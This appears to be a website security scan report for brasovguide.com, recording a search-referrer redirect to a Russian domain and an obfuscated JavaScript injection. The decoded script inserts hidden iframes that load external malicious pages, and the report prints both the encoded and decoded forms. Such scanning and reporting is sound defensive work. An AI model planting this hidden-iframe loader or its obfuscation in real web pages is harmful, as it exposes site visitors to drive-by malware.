Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://brasovguide.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: brasovguide.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Tue, 23 Sep 2014 18:35:27 GMT Location: http://medicquil.ru Server: LiteSpeed Content-Length: 1148 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://brasovguide.com/ | 200 OK Content-Length: 13622 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;} if(x){fr="fromChar";f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,98,112,98,86,101,90,94,37,89,100,100,37,107,96,105,94,107,37,45,90,91,89,43, if(x&&f&&012===10)e(s); Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://mylandi.com/visit/8ced4e2090a113580d77f98cfc397079' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://mylandi.com/visit/8ced4e2090a113580d77f98cfc397079');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0' <iframe src='http://mylandi.com/visit/8ced4e2090a113580d77f98cfc397079' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://brasovguide.com/test404page.js | 404 Not Found Content-Length: 218 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 style: hidden src: http://http-iframe.org/s/in.cgi?7 <iframe rqhtl='l0bwg7vw' src='http://http-iframe.org/s/in.cgi?7 ' ljgvd='x7po0zy6' width='0' height='0' style='display:none'> | ||
http://rondoniainfoco.com/admin/indexd.php | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
http://rondoniainfoco.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brasovguide.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brasovguide.com/
Result: brasovguide.com is not infected or malware details are not published yet.
Result: brasovguide.com is not infected or malware details are not published yet.